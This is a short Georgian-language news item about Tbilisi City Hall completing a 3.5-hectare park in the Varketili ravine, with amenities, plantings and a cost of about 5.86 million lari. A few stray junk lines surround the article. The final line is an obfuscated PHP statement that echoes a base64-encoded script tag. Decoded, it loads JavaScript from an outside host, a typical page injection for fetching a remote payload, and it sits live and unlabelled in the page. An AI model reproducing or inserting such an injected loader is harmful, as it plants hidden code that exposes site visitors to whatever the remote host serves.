celsiusi
ავერსი შნაიდერი
თბილისის მერიის გარემოს დაცვის საქალაქო სამსახურმა სამგორის რაიონში, ვარკეთილის ხევში, 3.5 ჰექტარ ფართობზე არსებული პარკის მოწყობის სამუშაოები დაასრულა. განახლებული პარკი დღეს საზეიმო კონცერტით გაიხსნა. 
 
მერიის ინფორმაციით, რეაბილიტაციის ფარგლებში, ტერიტორიაზე არსებული ბუნებრივი რესურსი და მწვანე ნარგავები შოენარჩუნდა. გარემოში მინიმალური ჩარევით, თანამედროვე რეკრეაციული სივრცე შეიქმნა, რომელიც პასიური და აქტიური დასვენების ზონებად დაიყო. პარკი გათვლილია ყველა ასაკობრივ ჯგუფზე და სრულად არის ადაპტირებული შეზღუდული შესაძლებლობების მქონე პირებზე.
  
პარკის ტერიტორიაზე, მოსასვენებელი სივრცეები, ღია ამფითეატრი, შადრევანი, სასმელი წყლის შადრევნები, სკეიტ პარკი, ველობილიკი, გადმოსახედი ბაქანი, სხვადასხვა ასაკობრივი ჯგუფისთვის განკუთვნილი საბავშვო მოედნები, ატრაქციონები, სპორტული მოედნები, ძაღლების სასეირნო და სავარჯიშო სივრცე მოეწყო. ასევე, განახლდა არსებული საფეხმავლო ხიდი და მდელოს სახით, გაჩნდა საპიკნიკე არეალები.
  
პარკის ტერიტორია შეივსო მწვანე ნარგავებით. დაირგო 1 191 ძირი ხე, 13 930 ძირი ბუჩქი და 14 193 ბალახოვანი მცენარე. ჰიდროთესვის პრინციპით, 21 061 კვადრატულ მეტრ ფართობზე დაითესა და 3 600 კვადრატულ მეტრ ფართობზე დაიგო ბალახი. სამუშაოების ღირებულებამ 5 863 718 ლარი შეადგინა.
 
 
 
1139
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");